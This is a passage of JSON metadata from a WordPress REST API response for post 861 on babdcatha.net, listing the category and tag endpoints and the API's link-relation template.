861"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/categories?post=861"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/tags?post=861"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}